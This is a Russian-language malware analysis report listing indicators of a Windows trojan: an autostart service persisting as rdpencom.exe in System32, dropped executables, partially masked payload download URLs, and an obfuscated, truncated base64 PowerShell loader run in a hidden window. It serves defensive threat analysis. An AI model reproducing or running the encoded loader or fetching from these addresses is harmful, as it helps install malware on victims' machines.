Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\rdpencom] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rdpencom] 'ImagePath' = '"<SYSTEM32>\ogldrv\rdpencom.exe"'
- 'rdpencom' "<SYSTEM32>\ogldrv\rdpencom.exe"
- 'rdpencom' <SYSTEM32>\ogldrv\rdpencom.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHYANABoADkAXwAyAD0AKAAoACcATgBwACcAKwAnAGYAegBtACcAKQArACcAbQBpACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBwAFIATwBmAGkAbABlAFwAbAA3ADAAZwBFAD...
- %HOMEPATH%\l70ge02\kerifx4\lfqgw3.exe
- <SYSTEM32>\ogldrv\rdpencom.exe
- %HOMEPATH%\l70ge02\kerifx4\lfqgw3.exe в <SYSTEM32>\ogldrv\rdpencom.exe
- '14#.#86.212.146':80
- http://www.ag###stepp.com/ww12/6ZI/
- http://ba##ia.net/baiaseu/m4G4chJ/
- http://14#.#86.212.146/t6HesZJXsoveXt6Pz/OscPE/SAD4DSmebOCqd/SEzDlXgs/
- DNS ASK ag###stepp.com
- DNS ASK ba##ia.net
- '%HOMEPATH%\l70ge02\kerifx4\lfqgw3.exe'
- '<SYSTEM32>\ogldrv\rdpencom.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHYANABoADkAXwAyAD0AKAAoACcATgBwACcAKwAnAGYAegBtACcAKQArACcAbQBpACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBwAFIATwBmAGkAbABlAFwAbAA3ADAAZwBFAD...' (со скрытым окном)